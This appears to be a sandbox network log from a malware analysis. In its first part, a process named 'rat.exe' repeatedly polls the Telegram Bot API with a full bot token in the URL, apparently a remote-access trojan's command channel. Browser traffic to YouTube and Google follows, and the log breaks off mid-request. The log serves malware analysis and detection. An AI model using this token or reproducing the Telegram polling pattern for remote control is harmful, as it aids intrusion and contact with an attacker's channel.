https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506664

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506664 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:41 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506665

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506665 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:42 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506666

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506666 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:43 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506667

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506667 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:44 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506668

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506668 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:45 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506669

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506669 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:46 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506670

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506670 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:47 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506671

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506671 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:48 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506672

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506672 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:49 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506673

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506673 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:50 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506674

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506674 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:51 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506675

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506675 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:52 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506676

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506676 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:54 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506677

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506677 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:17:55 GMT
Content-Type: application/json
Content-Length: 23
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

220.167.154.149.in-addr.arpa

Remote address:

8.8.8.8:53

Request

220.167.154.149.in-addr.arpa

IN PTR

Response
DNS

232.168.11.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.168.11.51.in-addr.arpa

IN PTR

Response
DNS

13.86.106.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.86.106.20.in-addr.arpa

IN PTR

Response
DNS

53.210.109.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

53.210.109.20.in-addr.arpa

IN PTR

Response
DNS

171.39.242.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.39.242.20.in-addr.arpa

IN PTR

Response
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR

Response
DNS

www.youtube.com

msedge.exe

Remote address:

8.8.8.8:53

Request

www.youtube.com

IN A

Response

www.youtube.com

IN CNAME

youtube-ui.l.google.com

youtube-ui.l.google.com

IN A

142.250.200.14

youtube-ui.l.google.com

IN A

142.250.178.14

youtube-ui.l.google.com

IN A

172.217.169.46

youtube-ui.l.google.com

IN A

142.250.180.14

youtube-ui.l.google.com

IN A

216.58.213.14

youtube-ui.l.google.com

IN A

172.217.16.238

youtube-ui.l.google.com

IN A

172.217.169.14

youtube-ui.l.google.com

IN A

142.250.187.206

youtube-ui.l.google.com

IN A

142.250.187.238

youtube-ui.l.google.com

IN A

216.58.204.78

youtube-ui.l.google.com

IN A

142.250.179.238

youtube-ui.l.google.com

IN A

216.58.201.110

youtube-ui.l.google.com

IN A

216.58.212.238

youtube-ui.l.google.com

IN A

142.250.200.46
GET

https://www.youtube.com/

msedge.exe

Remote address:

142.250.200.14:443

Request

GET / HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://www.youtube.com/s/_/ytmainappweb/_/js/k=ytmainappweb.kevlar_base.en_US.kRiB51x5Wcg.es5.O/d=0/br=1/rs=AGKMywF7t5Fisb8Mh0y29Rcj07oeutDZdw

msedge.exe

Remote address:

142.250.200.14:443

Request

GET /s/_/ytmainappweb/_/js/k=ytmainappweb.kevlar_base.en_US.kRiB51x5Wcg.es5.O/d=0/br=1/rs=AGKMywF7t5Fisb8Mh0y29Rcj07oeutDZdw HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=MKzXzLEu5is
cookie: __Secure-YEC=CgtDYnEyTHhwd2FSZyiuyY68BjIKCgJHQhIEGgAgaA%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgaA%3D%3D
GET

https://www.youtube.com/s/desktop/b5305900/jsbin/web-animations-next-lite.min.vflset/web-animations-next-lite.min.js

msedge.exe

Remote address:

142.250.200.14:443

Request

GET /s/desktop/b5305900/jsbin/web-animations-next-lite.min.vflset/web-animations-next-lite.min.js HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=MKzXzLEu5is
cookie: __Secure-YEC=CgtDYnEyTHhwd2FSZyiuyY68BjIKCgJHQhIEGgAgaA%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgaA%3D%3D
GET

https://www.youtube.com/s/desktop/b5305900/jsbin/custom-elements-es5-adapter.vflset/custom-elements-es5-adapter.js

msedge.exe

Remote address:

142.250.200.14:443

Request

GET /s/desktop/b5305900/jsbin/custom-elements-es5-adapter.vflset/custom-elements-es5-adapter.js HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=MKzXzLEu5is
cookie: __Secure-YEC=CgtDYnEyTHhwd2FSZyiuyY68BjIKCgJHQhIEGgAgaA%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgaA%3D%3D
GET

https://www.youtube.com/s/desktop/b5305900/jsbin/webcomponents-sd.vflset/webcomponents-sd.js

msedge.exe

Remote address:

142.250.200.14:443

Request

GET /s/desktop/b5305900/jsbin/webcomponents-sd.vflset/webcomponents-sd.js HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=MKzXzLEu5is
cookie: __Secure-YEC=CgtDYnEyTHhwd2FSZyiuyY68BjIKCgJHQhIEGgAgaA%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgaA%3D%3D
GET

https://www.youtube.com/s/desktop/b5305900/jsbin/intersection-observer.min.vflset/intersection-observer.min.js

msedge.exe

Remote address:

142.250.200.14:443

Request

GET /s/desktop/b5305900/jsbin/intersection-observer.min.vflset/intersection-observer.min.js HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=MKzXzLEu5is
cookie: __Secure-YEC=CgtDYnEyTHhwd2FSZyiuyY68BjIKCgJHQhIEGgAgaA%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgaA%3D%3D
GET

https://www.youtube.com/s/desktop/b5305900/jsbin/scheduler.vflset/scheduler.js

msedge.exe

Remote address:

142.250.200.14:443

Request

GET /s/desktop/b5305900/jsbin/scheduler.vflset/scheduler.js HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=MKzXzLEu5is
cookie: __Secure-YEC=CgtDYnEyTHhwd2FSZyiuyY68BjIKCgJHQhIEGgAgaA%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgaA%3D%3D
GET

https://www.youtube.com/s/desktop/b5305900/cssbin/www-main-desktop-home-page-skeleton.css

msedge.exe

Remote address:

142.250.200.14:443

Request

GET /s/desktop/b5305900/cssbin/www-main-desktop-home-page-skeleton.css HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=MKzXzLEu5is
cookie: __Secure-YEC=CgtDYnEyTHhwd2FSZyiuyY68BjIKCgJHQhIEGgAgaA%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgaA%3D%3D
GET

https://www.youtube.com/s/desktop/b5305900/cssbin/www-onepick.css

msedge.exe

Remote address:

142.250.200.14:443

Request

GET /s/desktop/b5305900/cssbin/www-onepick.css HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=MKzXzLEu5is
cookie: __Secure-YEC=CgtDYnEyTHhwd2FSZyiuyY68BjIKCgJHQhIEGgAgaA%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgaA%3D%3D
GET

https://www.youtube.com/s/desktop/b5305900/jsbin/www-i18n-constants-en_US.vflset/www-i18n-constants.js

msedge.exe

Remote address:

142.250.200.14:443

Request

GET /s/desktop/b5305900/jsbin/www-i18n-constants-en_US.vflset/www-i18n-constants.js HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=MKzXzLEu5is
cookie: __Secure-YEC=CgtDYnEyTHhwd2FSZyiuyY68BjIKCgJHQhIEGgAgaA%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgaA%3D%3D
GET

https://www.youtube.com/s/desktop/b5305900/jsbin/www-tampering.vflset/www-tampering.js

msedge.exe

Remote address:

142.250.200.14:443

Request

GET /s/desktop/b5305900/jsbin/www-tampering.vflset/www-tampering.js HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=MKzXzLEu5is
cookie: __Secure-YEC=CgtDYnEyTHhwd2FSZyiuyY68BjIKCgJHQhIEGgAgaA%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgaA%3D%3D
GET

https://www.youtube.com/s/desktop/b5305900/jsbin/spf.vflset/spf.js

msedge.exe

Remote address:

142.250.200.14:443

Request

GET /s/desktop/b5305900/jsbin/spf.vflset/spf.js HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=MKzXzLEu5is
cookie: __Secure-YEC=CgtDYnEyTHhwd2FSZyiuyY68BjIKCgJHQhIEGgAgaA%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgaA%3D%3D
GET

https://www.youtube.com/s/desktop/b5305900/jsbin/network.vflset/network.js

msedge.exe

Remote address:

142.250.200.14:443

Request

GET /s/desktop/b5305900/jsbin/network.vflset/network.js HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=MKzXzLEu5is
cookie: __Secure-YEC=CgtDYnEyTHhwd2FSZyiuyY68BjIKCgJHQhIEGgAgaA%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgaA%3D%3D
GET

https://www.youtube.com/s/_/ytmainappweb/_/ss/k=ytmainappweb.kevlar_base.7hiJwkXlKs8.L.B1.O/am=AABBAg/d=0/br=1/rs=AGKMywGGJrddI2OdqQpm3Rz8uCoVK9lqTQ

msedge.exe

Remote address:

142.250.200.14:443

Request

GET /s/_/ytmainappweb/_/ss/k=ytmainappweb.kevlar_base.7hiJwkXlKs8.L.B1.O/am=AABBAg/d=0/br=1/rs=AGKMywGGJrddI2OdqQpm3Rz8uCoVK9lqTQ HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=MKzXzLEu5is
cookie: __Secure-YEC=CgtDYnEyTHhwd2FSZyiuyY68BjIKCgJHQhIEGgAgaA%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgaA%3D%3D
GET

https://www.youtube.com/s/desktop/b5305900/cssbin/www-main-desktop-watch-page-skeleton.css

msedge.exe

Remote address:

142.250.200.14:443

Request

GET /s/desktop/b5305900/cssbin/www-main-desktop-watch-page-skeleton.css HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=MKzXzLEu5is
cookie: __Secure-YEC=CgtDYnEyTHhwd2FSZyiuyY68BjIKCgJHQhIEGgAgaA%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgaA%3D%3D
DNS

i.ytimg.com

msedge.exe

Remote address:

8.8.8.8:53

Request

i.ytimg.com

IN A

Response

i.ytimg.com

IN A

142.250.200.22

i.ytimg.com

IN A

142.250.178.22

i.ytimg.com

IN A

142.250.180.22

i.ytimg.com

IN A

142.250.187.246

i.ytimg.com

IN A

216.58.204.86

i.ytimg.com

IN A

172.217.169.86

i.ytimg.com

IN A

216.58.212.214

i.ytimg.com

IN A

142.250.187.214

i.ytimg.com

IN A

172.217.169.54

i.ytimg.com

IN A

172.217.169.22

i.ytimg.com

IN A

142.250.200.54

i.ytimg.com

IN A

142.250.179.246

i.ytimg.com

IN A

216.58.213.22

i.ytimg.com

IN A

216.58.201.118

i.ytimg.com

IN A

216.58.212.246

i.ytimg.com

IN A

172.217.16.246
GET

https://i.ytimg.com/generate_204

msedge.exe

Remote address:

142.250.200.22:443

Request

GET /generate_204 HTTP/2.0
host: i.ytimg.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

accounts.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

accounts.google.com

IN A

Response

accounts.google.com

IN A

142.251.173.84
GET

https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en

msedge.exe

Remote address:

142.251.173.84:443

Request

